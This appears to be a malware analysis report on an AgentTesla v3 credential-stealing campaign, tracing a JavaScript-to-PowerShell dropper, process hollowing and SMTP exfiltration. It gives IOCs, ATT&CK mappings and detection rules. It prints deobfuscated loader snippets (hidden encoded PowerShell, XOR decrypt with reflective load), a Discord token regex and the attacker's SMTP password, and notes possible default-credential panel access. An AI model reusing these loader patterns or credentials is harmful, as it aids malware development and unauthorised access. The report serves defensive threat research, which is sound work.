highPhishing

AgentTesla v3 — Five-Stage JavaScript Dropper with SMTP Exfiltration

PublishedMarch 12, 2026

Threat Actors:s to steal credentials from businesses.reads stolen credsmanagement

phishingagentteslacredential-theftc2apt

TLP: WHITE | Breakglass Intelligence | Analyst: GHOST | Date: 2026-03-12

Executive Summary

This report covers a fully analyzed AgentTesla v3 credential-stealing malware campaign delivered via an obfuscated JavaScript dropper. The infection chain spans five stages: an obfuscated 1.3MB JS dropper → multi-layer XOR-decrypted PowerShell → reflective .NET assembly loader → process-hollowing injector → final AgentTesla payload.

The final payload exfiltrates stolen credentials via SMTP to kc@cottondreams.org using the account mail@cottondreams.org (password: Payday2025) hosted on a Ukrainian VPS at 31.222.235.198 (NETH LLC, Kyiv, AS202302). The threat actor uses a FASTPANEL hosting control panel (port 8888) for server management and Exim 4.95 as the mail transport.

The malware targets an extraordinarily broad credential surface: 40+ browsers, 20+ email clients, 10+ FTP clients, VPN software (NordVPN, OpenVPN, PIA), Discord tokens, and Windows Credential Manager vaults. Campaign siblings trace back to January 2025, with the infrastructure domain registered in March 2024, indicating a persistent, long-running operation.

Threat actor profile: English-language phishing lures (fake purchase orders), Ukrainian hosting infrastructure, FASTPANEL admin panel — consistent with a financially motivated MaaS (Malware-as-a-Service) operator or single actor targeting businesses with spear phishing.

Sample Metadata

Field	Value
Filename	`b78e6df5cd46adfe6472ccd1edc3bff0.js`
SHA256	`99ef1d7248d7c0cd7ce3b10213a17336797951c4b1cef0a4c1d03330e4c95a5a`
MD5	`b78e6df5cd46adfe6472ccd1edc3bff0`
SHA1	`85f23b01186c371111e87bbdbc1e950c60df7cd6`
File Type	text/plain (obfuscated JavaScript)
File Size	1,316,775 bytes (1.3 MB)
First Seen	2026-03-12 17:15:04 UTC
Reporter	abuse_ch
VT Detections	14/76
VT Tags	javascript, AgentTesla
Family	AgentTesla v3
Delivery	Spear phishing (fake purchase orders)

Stage Hashes

Stage	File	SHA256	MD5	Size	VT
1	JS Dropper	`99ef1d72...`	`b78e6df5...`	1.3 MB	14/76
4	DEV.dll (.NET injector)	`195e3d85...`	`061c1eed...`	47 KB	22/76
5	AgentTesla payload	`af5f5302...`	`71d57788...`	240 KB	61/76

Static Analysis — Infection Chain

Stage 1: Obfuscated JavaScript Dropper

The initial sample is a 1.3MB single-line JavaScript file with multi-layer obfuscation:

Obfuscation: String table with 166 encoded entries, custom Base64/XOR encoding, anti-debugging via Date.now() timing checks
Execution vector: Runs via Windows Script Host (WScript.exe)
Purpose: Decodes and executes an embedded PowerShell payload via WScript.Shell.Run
Anti-analysis: Checks for process names, timing-based debugger detection

// Deobfuscated execution core (representative):
var shell = new ActiveXObject("WScript.Shell");
shell.Run("powershell -WindowStyle Hidden -EncodedCommand " + base64_payload, 0, false);

Stage 2: Multi-Layer PowerShell Decryptor (980KB)

The embedded PowerShell payload (stage2_decoded.ps1, 980KB) implements a five-stage decryption pipeline:

Layer 1: Base64 decode of a 1.3-million-character string
Layer 2: Custom rotational XOR cipher with embedded key
Layer 3: Second XOR pass with derived key
Layer 4: Byte array reconstruction
Layer 5: Load and invoke .NET assembly via reflection

XOR Key: Extracted from the PowerShell source. Applies a rotational byte XOR with position-dependent key material.

# Decryption core (simplified):
$key = [byte[]](...)  # embedded XOR key
$data = [System.Convert]::FromBase64String($bigPayload)
for ($i = 0; $i -lt $data.Length; $i++) {
    $data[$i] = $data[$i] -bxor $key[$i % $key.Length]
}
[System.Reflection.Assembly]::Load($data)

Stage 3: Reflective .NET Assembly Loader (721KB)

stage3_decoded.ps1 (721KB) is the decrypted output of Stage 2, containing:

Function Invoke-AssemblyExecution: Loads a .NET assembly from a byte array via reflection and invokes a specified method
Function Test-ProcessAbsence: Checks if Aspnet_compiler is running (persistence guard)
Function Start-MonitoringCycle: Main loop that spawns the injector if the target process is absent

Key invocation:

Invoke-AssemblyExecution -AssemblyBlob $assemblyData `
    -TypeName 'DEV.DOWN' `
    -MethodName 'SHOOT' `
    -MethodArguments $invocationParams

This invokes the method DEV.DOWN.SHOOT in the Stage 4 assembly, passing the Stage 5 payload as a byte array argument.

Stage 4: Process Hollowing Injector — DEV.dll (47KB)

stage4_assembly.exe (SHA256: 195e3d85..., VT: 22/76, also known as DEV.dll, payload_1.dll) is a 47KB .NET DLL:

Namespace/Class: DEV.DOWN
Method: SHOOT (static, public)
Technique: Process hollowing — creates a suspended aspnet_compiler.exe process, unmaps its memory, maps the Stage 5 payload, then resumes execution
Capabilities: Process injection, shellcode execution, screenshot capability
VT names: DEV.dll, payload_1.dll, rcgxens.exe
VT family: MSIL/Injector.UWS, Gen:Variant.Zusy.602588

Process hollowing target: aspnet_compiler.exe (legitimate .NET compiler)
Hollowed and replaced with: Stage 5 AgentTesla payload

Stage 5: AgentTesla v3 Payload (240KB)

stage5_payload.exe (SHA256: af5f5302..., VT: 61/76) is a 240KB .NET assembly — the final AgentTesla v3 infostealer.

Compile target: e8ae4cc3-dac5-429a-ad46-d51bb0595a38.exe (GUID-based name, anti-forensic) Persistence name: GLOZVJ.exe in %APPDATA%\GLOZVJ\ Runtime path: Executed hollow inside aspnet_compiler.exe

C2 Configuration (Extracted from .NET User Strings Heap)

Protocol:  SMTP (port 587, STARTTLS)
Server:    mail.cottondreams.org
Sender:    mail@cottondreams.org
Password:  Payday2025
Recipient: kc@cottondreams.org
SSL:       true

Exfiltration format: HTML-formatted emails with subject containing victim hostname, IP, username, OS version. Attachments contain keylog data, screenshots, and harvested credentials organized by type (PW = passwords, KL = keylog, SC = screenshot, CP = clipboard).

Behavioral Analysis

Persistence

Registry:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GLOZVJ
Path:      %APPDATA%\GLOZVJ\GLOZVJ.exe

Anti-Analysis

Checks for Aspnet_compiler process before re-injecting
Uses legitimate system process (aspnet_compiler.exe) as a host
GUID-based filename to defeat static hash lookups
Multi-layer obfuscation through 5 stages

Credential Harvesting Targets

Browsers (40+): Chrome, Firefox, Edge Chromium, Opera, Brave, Vivaldi, Yandex Browser, Chromium, Waterfox, SeaMonkey, Thunderbird, PaleMoon, IceFox, CyberFox, IceDragon, Epic Privacy Browser, UC Browser, Coccoc, Torch, Kometa, Flock, Orbitum, Elements Browser, Sputnik, Liebao Browser, QQ Browser, 7Star, Iridium, Amigo, CentBrowser, Comodo Dragon, and more.

Email Clients: Outlook (all versions 11.0–16.0), Thunderbird, The Bat!, Opera Mail, Eudora, IncrediMail, FoxMail, Mailbird, Claws Mail, eM Client, Becky!, Postbox, Windows Mail App, SeaMonkey Mail

FTP/File Transfer: FileZilla, CoreFTP, WinSCP, SmartFTP, FlashFXP, FTP Navigator, WS_FTP, FTP Commander, FTPGetter, FTP Commander Deluxe

VPN: OpenVPN (config files + registry), NordVPN (user.config), Private Internet Access (account.json)

Remote Access / VNC: RealVNC 3.x and 4.x, TightVNC, TigerVNC, UltraVNC

Messaging / Social: Discord (token scraping via regex [\w-]{24}\.[\w-]{6}\.[\w-]{27}), Pidgin, Trillian, Paltalk, Psi/Psi+

Other: MySQL Workbench, JDownloader 2.0, DynDNS, Windows Credential Manager vaults (all 8 vault GUIDs), IE/Edge credential vault

Keylogger

WH_KEYBOARD_LL hook captures all keystrokes
Active window title captured with each keystroke block
Interval: configurable (KeyloggerInterval)
Output: <b>[ WindowTitle ]</b> (timestamp) HTML format

Screenshots

CopyFromScreen GDI method
JPEG format, yyyy_MM_dd_HH_mm_ss filename
Interval: configurable (ScreenInterval)

Clipboard

SetClipboardViewer hook
Sends clipboard content to C2

Public IP Discovery

Makes HTTP request to external IP-check service (PublicIpAddressGrab)
Included in every exfil email header

AES Encryption (Browser credential decryption)

BCrypt AES-GCM for Chromium v80+ Local State encrypted keys
DPAPI (ProtectedData.Unprotect) for older browser credential databases
Custom decryption routines for Firefox key4.db / key3.db (NSS)

Kill Chain / Infection Flow

[Phishing Email]
  └─ Attachment: fake_PO.js (or renamed .js disguised as document)
       └─ Stage 1: WScript.Shell executes obfuscated JS
            └─ Stage 2: PowerShell (980KB, multi-XOR decryptor)
                 └─ Stage 3: Reflective loader PS1 (721KB)
                      └─ Stage 4: DEV.dll loaded via Assembly::Load()
                           │   TypeName: DEV.DOWN, Method: SHOOT
                           └─ Stage 5: AgentTesla injected into aspnet_compiler.exe
                                ├─ Persistence: %APPDATA%\GLOZVJ\GLOZVJ.exe
                                ├─ Keylogger: WH_KEYBOARD_LL hook
                                ├─ Screenshot: GDI CopyFromScreen
                                ├─ Clipboard: SetClipboardViewer
                                ├─ Credential harvest: 40+ browsers, 20+ email clients
                                └─ Exfil: SMTP → kc@cottondreams.org via mail.cottondreams.org:587

Network Indicators

C2 Infrastructure

Indicator	Type	Notes
`mail.cottondreams.org`	C2 SMTP hostname	Mail server for exfiltration
`31.222.235.198`	C2 IP	Resolves to mail.cottondreams.org
`cottondreams.org`	C2 domain	Registered 2024-03-24, Namecheap
`kc@cottondreams.org`	C2 email (recipient)	Exfil destination
`mail@cottondreams.org`	C2 email (sender)	SMTP auth account

Server Profile — 31.222.235.198

Field	Value
IP	31.222.235.198
Country	Ukraine (UA)
City	Kyiv
ISP/Org	NETH LLC
ASN	AS202302
Hosting	netx.com.ua (Ukrainian VPS)
OS	Ubuntu Linux
SSH	OpenSSH 8.9p1 Ubuntu-3ubuntu0.13
MTA	Exim smtpd 4.95
IMAP/POP	Dovecot (Ubuntu)
Web	nginx 1.28.0
Panel	FASTPANEL (port 8888, port 7777)
TLS CN	dedaGLmj.netx.com.ua (self-signed)
VT Flagged	Yes (SOCRadar: malware)
Last Updated	2026-03-12

Open Ports on C2 Server

Port	Service	Notes
21/tcp	ProFTPD (Debian/Ubuntu)	FTP
22/tcp	OpenSSH 8.9p1	Management access
25/tcp	Exim 4.95	SMTP
80/tcp	nginx 1.28.0	HTTP (returns content)
110/tcp	Dovecot POP3	TLS: dedaGLmj.netx.com.ua
143/tcp	Dovecot IMAP	TLS: dedaGLmj.netx.com.ua
443/tcp	nginx 1.28.0	HTTPS (TLS CN: "parking")
465/tcp	Exim 4.95	SMTPS
587/tcp	Exim 4.95	SMTP Submission (C2 exfil)
993/tcp	Dovecot IMAPS	Encrypted IMAP
995/tcp	Dovecot POP3S	Encrypted POP3
7777/tcp	FASTPANEL	Hosting control panel
8888/tcp	FASTPANEL	Hosting control panel (redirects to HTTPS)

Note: FASTPANEL is a Russian-developed web hosting control panel widely used by post-Soviet hosting providers. The presence of FASTPANEL on both 7777 and 8888 identifies the server management interface. FASTPANEL has default credentials (admin/password) if not changed.

Domain Intelligence

Field	Value
Domain	cottondreams.org
Registrar	NameCheap, Inc.
Registered	2024-03-24
Expires	2026-03-24
DNS	Cloudflare (`cosmin.ns.cloudflare.com`, `jacqueline.ns.cloudflare.com`)
Privacy	Cloudflare DNS proxy (IP hidden via WHOIS, but resolves directly)
VT Detections	5/94 (CRDF, CyRadar, Forcepoint, Seclookup, Webroot)
crt.sh Certs	109 certificates found
Cert Issuer	Let's Encrypt (R3), Sectigo, Google Trust Services

Certificate Transparency — Subdomains Observed

Subdomain	Notes
`cottondreams.org`	Root
`www.cottondreams.org`	Web
`mail.cottondreams.org`	C2 SMTP server
`server.cottondreams.org`	Additional server endpoint
`*.cottondreams.org`	Wildcard cert (Sectigo)
`cottondreams.org.auss-rite.store`	Cross-domain cert (suspicious)

MITRE ATT&CK TTPs

Technique ID	Technique Name	Implementation
T1059.007	JavaScript	Stage 1: Obfuscated JS dropper
T1059.001	PowerShell	Stages 2-3: Multi-layer PS1 execution
T1027	Obfuscated Files or Information	5-stage obfuscation chain
T1027.010	Command Obfuscation	Base64 + XOR encoding in PowerShell
T1027.002	Software Packing	Custom XOR packing of payloads
T1620	Reflective Code Loading	Stage 3→4: `Assembly::Load()`
T1055.012	Process Hollowing	Stage 4: Hollows `aspnet_compiler.exe`
T1547.001	Registry Run Keys	HKCU Run key for GLOZVJ.exe
T1056.001	Keylogging	WH_KEYBOARD_LL hook
T1113	Screen Capture	GDI `CopyFromScreen`
T1115	Clipboard Data	`SetClipboardViewer` hook
T1555.003	Credentials from Web Browsers	40+ browser credential harvesting
T1555	Credentials from Password Stores	Windows Credential Manager
T1552.001	Credentials in Files	FTP/email/VPN config file parsing
T1528	Steal Application Access Token	Discord token regex extraction
T1020	Automated Exfiltration	SMTP exfil to C2 at configurable intervals
T1048.003	Exfiltration Over Unencrypted Protocol	SMTP with STARTTLS on port 587
T1071.003	Application Layer Protocol: Mail	SMTP for C2 exfiltration
T1082	System Information Discovery	CPU, RAM, OS, MAC, IP collection
T1016	System Network Configuration Discovery	Public IP via HTTP
T1057	Process Discovery	Checks for `Aspnet_compiler` process
T1140	Deobfuscate/Decode Files or Information	Multi-stage decryption
T1566.001	Spear Phishing Attachment	.js file disguised as business document

IOCs

File Hashes

Hash	Algorithm	File	Family
`99ef1d7248d7c0cd7ce3b10213a17336797951c4b1cef0a4c1d03330e4c95a5a`	SHA256	Stage 1 JS dropper	Loader
`b78e6df5cd46adfe6472ccd1edc3bff0`	MD5	Stage 1 JS dropper	Loader
`85f23b01186c371111e87bbdbc1e950c60df7cd6`	SHA1	Stage 1 JS dropper	Loader
`195e3d859d8fa9d0c12cd38beef8898e307b71422c8a18c2c3648f5f0220b447`	SHA256	Stage 4 DEV.dll injector	Injector
`061c1eed62c8326f2c8052851090f33d`	MD5	Stage 4 DEV.dll injector	Injector
`af5f53021774cf410f7cc1be223f3dd88e3c6439cfa384bb64ed749c7e5390c7`	SHA256	Stage 5 AgentTesla	AgentTesla v3
`71d57788cede0516516dae01575e2331`	MD5	Stage 5 AgentTesla	AgentTesla v3
`21306f0870d06c40d568218dc3c9e7023cb4ae03`	SHA1	Stage 5 AgentTesla	AgentTesla v3
`b2059d59922556f2677361a44d5b1c0a4422654e1f8e1af8f311771c4cf818d2`	SHA256	Campaign sibling (Wipfztftom.exe)	AgentTesla

Network IOCs

Indicator	Type	Context
`31.222.235.198`	IPv4	C2 SMTP server, Kyiv UA
`mail.cottondreams.org`	Domain	C2 SMTP hostname
`cottondreams.org`	Domain	C2 parent domain
`server.cottondreams.org`	Domain	Additional C2 subdomain
`kc@cottondreams.org`	Email	Exfil recipient
`mail@cottondreams.org`	Email	SMTP auth account

Host IOCs

Indicator	Type	Context
`%APPDATA%\GLOZVJ\GLOZVJ.exe`	File path	Persistence location
`GLOZVJ`	Mutex/Folder name	Persistence identifier
`HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GLOZVJ`	Registry	Autorun key
`e8ae4cc3-dac5-429a-ad46-d51bb0595a38.exe`	Filename	Dropped payload GUID name
`aspnet_compiler.exe`	Process	Process hollowing host
`DEV.DOWN`	.NET type name	Injector class
`SHOOT`	.NET method name	Injector entry point
`Payday2025`	SMTP password	C2 credential
`31b7ba0e-2740-4ee8-b8b7-4402b942518d`	GUID	WMI query identifier

Campaign Context

Timeline

Date	Event
2024-03-24	`cottondreams.org` registered on Namecheap; Let's Encrypt certs issued same day
2025-01-23	Campaign sibling `Wipfztftom.exe` ("PO For Quote No 228 for lab Furnitures.com") first seen on VT
2026-03-12	Current JS dropper sample submitted to MalwareBazaar by abuse_ch
2026-03-12	C2 server actively responding on all ports (confirmed)

SHA256	Name	First Seen	Notes
`b2059d59922556f2677361a44d5b1c0a4422654e1f8e1af8f311771c4cf818d2`	`Wipfztftom.exe` / `PO For Quote No 228 for lab Furnitures.com`	2025-01-23	Same C2 domain, spear phishing PO lure, 53/75 VT

Phishing Lure Analysis

The campaign sibling PO For Quote No 228 for lab Furnitures.com reveals the delivery mechanism: fake Purchase Order / business quote emails targeting procurement staff. This is a classic business email compromise (BEC) precursor technique used by financially motivated actors to steal credentials from businesses.

Attribution

Attribute	Assessment	Confidence
Malware family	AgentTesla v3 (MaaS)	High
Delivery	Spear phishing, fake PO/invoice lures	High
Infrastructure	Ukrainian VPS (NETH LLC, AS202302, Kyiv)	High
Panel	FASTPANEL (Russian-developed hosting panel)	High
Language/Region	Russian-speaking threat actor (probable)	Medium
Motivation	Financial — credential theft, corporate espionage	High
Actor type	AgentTesla MaaS subscriber or single-actor operator	Medium

OPSEC Mistakes:

Credentials in binary: SMTP password Payday2025 stored in plaintext in .NET user strings heap — trivially extractable with standard .NET analysis tools
Direct IP resolution: Despite Cloudflare DNS, mail.cottondreams.org resolves directly to the server IP (31.222.235.198), exposing hosting provider
FASTPANEL exposure: Management panel on ports 7777/8888 exposed to internet with self-signed certificate — potentially accessible with default credentials
Consistent infrastructure: Same domain used across campaign since March 2024 — no infrastructure rotation
Dovecot TLS leak: Certificate CN dedaGLmj.netx.com.ua reveals hosting on netx.com.ua (Ukrainian hosting reseller), bypassing the Namecheap/Cloudflare privacy layer

Infrastructure Map

Threat Actor
    │
    ├─── Registers cottondreams.org (Namecheap, 2024-03-24)
    │         │
    │         ├── DNS: Cloudflare (cosmin.ns, jacqueline.ns)
    │         │         └── A record → 31.222.235.198
    │         │
    │         └── MX: mail.cottondreams.org → 31.222.235.198
    │
    └─── VPS: 31.222.235.198
              │   ISP: NETH LLC (AS202302)
              │   City: Kyiv, Ukraine
              │   Hosting: netx.com.ua (dedaGLmj.netx.com.ua)
              │
              ├── Port 587: Exim 4.95 ← AgentTesla SMTP exfil
              ├── Port 25/465: Exim 4.95 (additional SMTP)
              ├── Port 993/143: Dovecot IMAPS/IMAP ← actor reads stolen creds
              ├── Port 995/110: Dovecot POP3S/POP3
              ├── Port 80/443: nginx 1.28.0 (web)
              ├── Port 22: OpenSSH 8.9p1 ← actor management
              ├── Port 21: ProFTPD ← file management
              └── Port 7777/8888: FASTPANEL ← admin panel

Victims → [infected machine] → aspnet_compiler.exe (hollowed)
    └── SMTP → mail.cottondreams.org:587 → kc@cottondreams.org

Detection Guidance

Email Gateway

Block/alert on emails with .js attachments
Block outbound SMTP to mail.cottondreams.org / 31.222.235.198
Monitor for emails matching subject pattern: [Hostname]/[Username]/[IP] (AgentTesla format)

EDR/Host

Alert on aspnet_compiler.exe spawned from non-ASP.NET build contexts
Alert on WScript.exe or cscript.exe spawning powershell.exe
Alert on creation of %APPDATA%\GLOZVJ\ directory or GLOZVJ.exe file
Alert on HKCU\Run key modifications from PowerShell parent

Network

Block all traffic to 31.222.235.198
Block DNS resolution of cottondreams.org and subdomains
Alert on SMTP connections from workstations (non-mail-server hosts) on port 587

Report generated by GHOST — Breakglass Intelligence "One indicator. Total infrastructure."